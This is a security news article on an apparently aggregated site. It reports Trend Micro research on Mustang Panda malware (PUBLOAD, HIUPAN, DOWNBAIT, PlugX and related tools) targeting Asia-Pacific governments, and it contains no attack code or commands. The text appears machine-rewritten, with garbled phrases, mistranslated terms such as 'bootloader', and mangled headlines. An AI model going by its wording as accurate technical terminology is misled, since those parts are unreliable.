Close Menu
Indo Guard OnlineIndo Guard Online
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
What's Hot

Citrix bleeding 2 defects provides tokens theft; Disadvantages SAP GUI Risk sensitive to data, impact of data

June 25, 2025

Praisian Khactivist Group traces Personal Records from Saudi Games 2024

June 25, 2025

Sonicwall Netextender Trojan and Connectwise Explois

June 25, 2025
Facebook X (Twitter) Instagram
Facebook X (Twitter) Instagram YouTube
Indo Guard OnlineIndo Guard Online
Subscribe
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
Indo Guard OnlineIndo Guard Online
Home » Mustang Panda Deploys Advanced Malware to Spy on Asia-Pacific Governments
Global Security

Mustang Panda Deploys Advanced Malware to Spy on Asia-Pacific Governments

AdminBy AdminSeptember 10, 2024No Comments3 Mins Read
Advanced Malware
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link


September 10, 2024Ravi LakshmananCyber ​​attack / malware

Advanced malware

The threat actor is tracked as Mustang Panda refined its malware arsenal to include new tools to facilitate data theft and deployment of next-stage payloads, according to new findings from Trend Micro.

A cyber security firm that tracks a cluster of activity called Earth Preta said it observed “the distribution of PUBLOAD via a variant of the HIUPAN worm.”

PUBLOAD is a known bootloader malware associated with Mustang Panda since early 2022, deployed as part of cyberattacks targeting government organizations in the Asia Pacific (APAC) region to deliver PlugX malware.

Cyber ​​security

“PUBLOAD was also used to inject additional tools into the target environment, such as FDMTP, which served as a secondary management tool that was observed to perform tasks similar to PUBLOAD; and PTSOCKET, a tool used as an alternative to exfiltration,” said security researchers Lennart Bermejo, Sunny Lu and Ted Lee.

Using Mustang Panda removable drives as a distribution vector for HIUPAN was previously documented by Trend Micro in March 2023. This is tracked by Mandiant, a Google-owned company FOG CLOAKwhich he observed in connection with a cyberespionage campaign targeting the Philippines that could begin as early as September 2021.

PUBLOAD is equipped with functions to perform reconnaissance of an infected network and collect interesting files (.doc, .docx, .xls, .xlsx, .pdf, .ppt and .pptx), while serving as a conduit for a new hacking tool called FDMTP, which is ” a simple malware downloader” implemented based on the TouchSocket protocol over Duplex Message Transfer Protocol (DMTP).

The resulting information is compressed into a RAR archive and transmitted to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been seen deploying a special program called PTSOCKET that can transfer files in multi-threaded mode.

Advanced malware

Additionally, Trend Micro attributes the adversary to a “fast-evolving” phishing campaign that it discovered in June 2024 distributing emails with a .url attachment that, when launched, is used to deliver a signed downloader called DOWNBAIT.

The campaign is believed to have targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia and Taiwan, based on the file names and contents of the decoy documents.

DOWNBAIT is a first-stage bootloader tool used to obtain and execute the PULLBAIT shellcode in memory, which then downloads and runs a first-stage backdoor called CBROVER.

Cyber ​​security

The implant, for its part, supports file upload and remote shell execution capabilities, and acts as a delivery vehicle for the PlugX Remote Access Trojan (RAT). PlugX then takes care of deploying another file collector called FILESAC that can collect the victim’s files.

The disclosure comes as Palo Alto Networks Unit 42 in detail Mustang Panda’s abuse of the reverse shell functionality built into Visual Studio Code to gain a foothold in targeted networks, indicating that the threat actor is actively changing its modus operandi.

“Earth Preta has demonstrated significant progress in its malware deployment and strategies, particularly in its campaigns targeting government organizations,” the researchers said. “The group developed their tactics by (…) using multi-stage bootloaders (from DOWNBAIT to PlugX) and possibly using Microsoft cloud services to steal data.”

Did you find this article interesting? Follow us Twitter  and LinkedIn to read more exclusive content we publish.





Source link

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Admin
  • Website

Related Posts

Citrix bleeding 2 defects provides tokens theft; Disadvantages SAP GUI Risk sensitive to data, impact of data

June 25, 2025

Praisian Khactivist Group traces Personal Records from Saudi Games 2024

June 25, 2025

Sonicwall Netextender Trojan and Connectwise Explois

June 25, 2025

North Korea related to supply networks is focused on developers with 35 malicious NPM packages

June 25, 2025

Microsoft extends Windows 10 security updates on one year with new enrollment options

June 25, 2025

The new visa rule in the US requires from applicants to set privacy in social media for the public

June 24, 2025
Add A Comment
Leave A Reply Cancel Reply

Loading poll ...
Coming Soon
Do You Like Our Website
: {{ tsp_total }}

Subscribe to Updates

Get the latest security news from Indoguardonline.com

Latest Posts

Citrix bleeding 2 defects provides tokens theft; Disadvantages SAP GUI Risk sensitive to data, impact of data

June 25, 2025

Praisian Khactivist Group traces Personal Records from Saudi Games 2024

June 25, 2025

Sonicwall Netextender Trojan and Connectwise Explois

June 25, 2025

North Korea related to supply networks is focused on developers with 35 malicious NPM packages

June 25, 2025

Microsoft extends Windows 10 security updates on one year with new enrollment options

June 25, 2025

The new visa rule in the US requires from applicants to set privacy in social media for the public

June 24, 2025

Hackers focus on over 70 Microsoft Exchange servers to steal credentials via Keyloggers

June 24, 2025

Researchers find a way to close Cryptominer companies using bad stocks and Xmrogue

June 24, 2025
About Us
About Us

Provide a constantly updating feed of the latest security news and developments specific to Indonesia.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

Citrix bleeding 2 defects provides tokens theft; Disadvantages SAP GUI Risk sensitive to data, impact of data

June 25, 2025

Praisian Khactivist Group traces Personal Records from Saudi Games 2024

June 25, 2025

Sonicwall Netextender Trojan and Connectwise Explois

June 25, 2025
Most Popular

In Indonesia, crippling immigration ransomware breach sparks privacy crisis

July 6, 2024

Why Indonesia’s Data Breach Crisis Calls for Better Security

July 6, 2024

Indonesia’s plan to integrate 27,000 govt apps in one platform welcomed but data security concerns linger

July 6, 2024
© 2025 indoguardonline.com
  • Home
  • About us
  • Contact us
  • Privacy Policy

Type above and press Enter to search. Press Esc to cancel.